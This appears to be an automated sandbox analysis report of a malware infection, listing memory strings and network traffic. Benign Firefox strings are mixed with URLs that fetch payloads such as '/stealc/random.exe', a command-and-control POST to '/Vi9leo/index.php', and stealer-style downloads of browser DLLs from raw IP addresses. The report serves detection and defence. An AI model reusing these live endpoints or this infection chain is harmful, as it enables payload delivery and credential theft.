Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: toolkit/global/browser-utils.ftlhttp://www.w3.org/1999/xlinkSERP Ad Telemetry RollouthttpSpeculativeParallelLimithttpSpeculativeParallelLimitmain/nimbus-desktop-experimentsfirefox-desktop-urlbar-release-9main/nimbus-desktop-experimentsmain/nimbus-desktop-experimentszero-prefix-weather-suggestionsmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentshttps://www.youtube.com/accountmain/nimbus-desktop-experimentsserp-ad-telemetry-rolloutzero-prefix-weather-suggestions equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/accountZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3334627067.0000028631DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2630851621.00000238F37C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F3769000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7667000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exeN
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.execodediD
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Local
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php(
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php17001
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php2
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php:N
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpM:S
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpl
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phplh
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpp
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpta
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/ViewSizePreferences.SourceAumid
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/fac00b58987e8fcf7b8c730804042ba5ce902415450#=
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/3w
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php-w6
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php.?i
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php6
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpA
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpE
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpJ
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpQ
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpSQ
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpV?
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpZ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpa
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpaY
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpb
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjQ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpwQ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpywB
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll9
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dlly
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll=
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllF
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000046A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Iw
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Qwj
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/al
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/cwx
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/l
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/r
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31EC
Source: 8ec8c5c339.exe, 00000008.00000002.2740205336.000000000249E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31FZSAi
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31Wi
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31p
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shandlerSvc
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dev.w3.org/html5/spec/rendering.html#rendering
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 00000018.00000002.2632654052.00000238F441F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2632654052.00000238F4437000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2632654052.00000238F4413000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2837667745.00000286321A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3333979888.0000028631C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2834188693.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2841500368.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833700774.000002863204C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833949224.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3308305890.000002862E965000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E8E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000023.00000002.3306154976.000002862E8E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ethiopic.org/Collation/OrderedLists.html.
Source: firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modul
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000023.00000002.3308305890.000002862E9B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630C75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316150456.0000028630BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3326407807.00000286315A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000023.00000003.2843731239.0000028630C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul%
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul);
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3846000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Global
